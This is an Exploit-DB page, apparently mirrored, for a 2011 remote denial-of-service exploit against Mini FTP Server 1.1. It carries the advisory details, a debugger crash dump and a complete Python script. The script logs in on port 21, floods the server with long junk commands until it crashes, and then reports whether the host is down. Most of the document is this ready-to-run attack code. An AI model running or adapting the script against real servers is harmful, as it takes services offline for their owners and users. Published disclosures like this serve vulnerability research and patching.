Mini FTP Server 1.1 – Buffer Corruption Remote Denial of Service

  • 作者: LiquidWorm
    日期: 2011-08-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/17742/
  • #!/usr/bin/python
#
#
# Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit
#
#
# Vendor: webmaster442
# Product web page: http://miniftpserver.codeplex.com
# Affected version: 1.1.1.0
#
# Summary: Minimal FTP server for windows. Uses only managed code. Works
# with Total commander.
#
# Desc: MiniFTPServer suffers from a denial of service vulnerability
# when passing large number of bytes after authentication, resulting
# in a crash. No need for a valid FTP command to exploit this issue.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# -----------------------------------------------------------------
#
# (1540.918): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
# eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc
# cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246
# 031187d3 3909cmp dword ptr [ecx],ecxds:0023:00000000=????????
# 0:011> d edx
# 00f163e880 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00.j.z(.......d...
# 00f163f854 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80Tr..............
# 00f1640800 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00....Ld..........
# 00f1641818 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00................
# 00f16428b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00................
# 00f1643800 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00............P...
# 00f1644800 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00....h..y....pd..
# 00f1645800 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00.............r..
# 0:011> d
# 00f1646800 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00..........\{....
# 00f1647880 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79.....d......`..y
# 00f16488c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79...............y
# 00f16498f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00....A.A.A.A.A.A.
# 00f164a841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
# 00f164b841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
# 00f164c841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
# 00f164d841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
#
# -----------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2011-5040
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php
#
#
# 28.08.2011
#

import socket, sys

if len(sys.argv) < 2:
	print ("\n===============================================")
	print ("\nMini FTP Server 1.1 Remote DoS Exploit\n")
	print ("Zero Science Lab - http://www.zeroscience.mk")
	print ("\nID: ZSL-2011-5040")
	print ("\n===============================================")
	print ("\n - Usage: "+ sys.argv[0] +" [hostname]\n")
	sys.exit(0)

host = (sys.argv[1])
data = ("A@" * 50000) #Any char and combination would do
cmd = ('ALLO') #Any CMD would do, or no CMD at all

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("\r\n[+] Attacking: " + host +"\r\n")
print ("[*] Please be patient...\r\n")

try:
	s.connect((host, 21))
	r=s.recv(1024)
	print (r)
	s.send("USER username\r\n")
	r=s.recv(1024)
	print (r)
	s.send("PASS password\r\n")
	r=s.recv(1024)
	print (r)
	s.send(cmd + " " + data + '\r\n')
	r=s.recv(1024)
	print (r)
	print ("[*] Please be patient...\r\n")
	for x in range(0,10): s.send(cmd + " " + data + '\r\n')
	r=s.recv(1024)
	print (r)
	s.close()

	try: s.connect((host,21))
	except:	print ("\r\n[*] Host is down!")

except:	print ("[*] Oops!")